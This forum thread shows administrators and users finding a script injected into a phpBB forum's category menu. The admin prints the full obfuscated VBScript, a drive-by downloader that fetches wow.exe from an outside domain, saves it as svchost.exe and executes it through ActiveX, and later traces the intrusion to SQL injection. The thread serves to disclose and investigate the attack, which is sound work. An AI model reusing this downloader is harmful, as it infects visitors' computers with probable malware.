Forum "jump to" menuproblem

[Tartara]

On forum pages that have a drop-down "Jump to" menu at the bottom, I'm getting a weird error that's causing the page to render with a width about ten times my screen size! The problem seems to be an item in the drop-down menu where some javascript is appearing verbatim. I've taken a screenshot in the hopes you can track it down.


My browser is Safari 2.0.4 on Mac OS X 10.4.10

[DM.]

You mean there's more browsers than just Firefox?

[Skyfire]

So long as (s)he's using anything other than IE, its good with me.

[Tartara]

You mean there's more browsers than just Firefox?

It's okay - I'm using Firefox at work! I haven't used IE in months (years?), unless I need to for testing purposes, and then I have to borrow someone else's computer to do so. When Microsoft decided to stop offering IE for Mac, no-one was happier than me

[Tartara]

Additional information:

Here's the source of the problematic option tag (replace {} with <>)
{option value="-1"}General{script src=http://www.exponentialsl.com/tags/css.j ... t}{/option}
The homepage of that domain looks a little dodgy - any idea why the script is in there, Rollie?

[Tartara]

Hm, not liking what I see here. Looking at that script sitting quietly in the Jump to: menu (which I'd never have noticed if Safari hadn't helpfully displayed it to me) I see a few disturbing things including a mention of svchost.exe which - according to http://www.liutilities.com/products/win ... y/svchost/ - is a BAD BAD THING. Any javascript wizzes around here want to look at it?

A quick google turns up just one other site referencing exponentialsl.com - and that's in some title tags on wowstatus.net, a site dedicated to spreading information on WoW private servers.

The script shows up in the source of these forums in Firefox too, though without the visible code in the menu, which makes me think perhaps it's actually running. Lucky I'm on a Mac! Any of you reading these forums with Windows, you might want to hold off for a bit. And run your virus/trojan scanners.

Rollie, I hope you haven't been hacked!

[Skyfire]

<a href="http://www.google.com/search?hl=en&q=sv ... >Google</a> says svchost is fine. the ones that are issues are those that are made to look like svchost, like svch0st, or scvhost, etc.

[Rollie]

ok, I'm out of town and on my laptop, digging into it as best I can for now. If nothing else, I may shut the forums down until I return.

Course if I do, you won't likely be able to read this =)

[Rollie]

Well, I was able to remove the offending entry. Unfortunately it means I have been compromised to some degree here. It could be as minor as the admin account having been hacked, to as major as my actual server being hacked. Unfortunately there is no way to know when this happened.

I'm still researching what it was doing exactly as I'm sure it was no good...

[Rollie]

This is what it looks like it was trying to run. From what little research I've done, it appears that it is trying to download a file, wow.exe from the exponentialsl.com site. My best guess is that this is a trojan, keylogger. I would strongly recommend all users update their virus scanners and do a fresh check.

<script>
on error resume next
t1= "http:\/\/"
t2= "www."
t3= "expone"
t4= "ntialsl"
t5= ".com"
t6= "\/wow"
t7= ".exe"
tcsafe = t1&t2&t3&t4&t5&t6&t7
m11="o"
m12="bj"
m13="ect"
m1=m11&m12&m13
m21="cl"
m22="ass"
m23="id"
m2= m21&m22&m23
m31="clsid:"
m32="BD96C556"
m33="-65A3-"
m34="11D0-983A"
m35="-00C04F"
m36="C29E36"
m3=m31&m32&m33&m34&m35&m36

m41="Microsoft"
m42=".XML"
m43="HTTP"
m4=m41&m42&m43

m51="Shel"
m52="l.App"
m53="lication"
m5=m51&m52&m53

m61="Scrip"
m62="ting.Fi"
m63="leSyst"
m64="emObject"
m6=m61&m62&m63&m64

sub tcsafe2exe(m5,X9)
set Xe = Xc.createobject(m5,"")
dd="open"
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub

Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3

Xi=m4
Set Xd = Xc.CreateObject(Xi,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg,"")
Xa.type = 1
Xh="GET"
Xd.Open Xh, tcsafe, False
Xd.Send
X9="svchost.exe"
set Xb = Xc.createobject(m6,"")
set Xe = Xb.GetSpecialFolder(2)
Xa.open
X9= Xb.BuildPath(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe2exe(m5,X9)
</script>

At this point I'm not sure how the intruder got in or how serious the invasion is. I am embarrassed and saddened by this news.

As far as I can tell only IE users or other browsers with installed ActiveX components were at risk. I will do more research as I can and will relay information as it becomes available.

I'm sorry =(

[WyriHaximus]

Wow that is a nasty little bugger :O! I hope your updated your software properly like a good developer should know Rollie .

[Balgair]

Eep, not good Only wow.exe files on my computer are the real thing, but updating and running virus/antispyware scans anyway to be on the safe side - I'm pretty sure I have my IE locked down to be safe from keyloggers etc but still gonna double-check to be sure!

[Rollie]

So I think I've tracked down some more details. It appears that the individual(s) responsible basically used an SQL injection attack to give themselves admin accounts on WCR. Using these admin accounts, they were able to put the scripts into the Category names.

I now face the daunting task of trying to figure out where they were able to successfully launch the SQL injection attack and snuff it out.

I believe this incident occurred around 8/14 midnight as that is when the account that gave access was created. I have disabled/banned the accounts and removed the admin rights. I'll also be modifying the phpbb code to disallow that type of thing from occurring again in the future.

[heartless_]

Sorry to hear about it man, but at least you were honest about it and have a clue as to how to fix it. I've seen things like this happen on guild run forums and it is disastrous.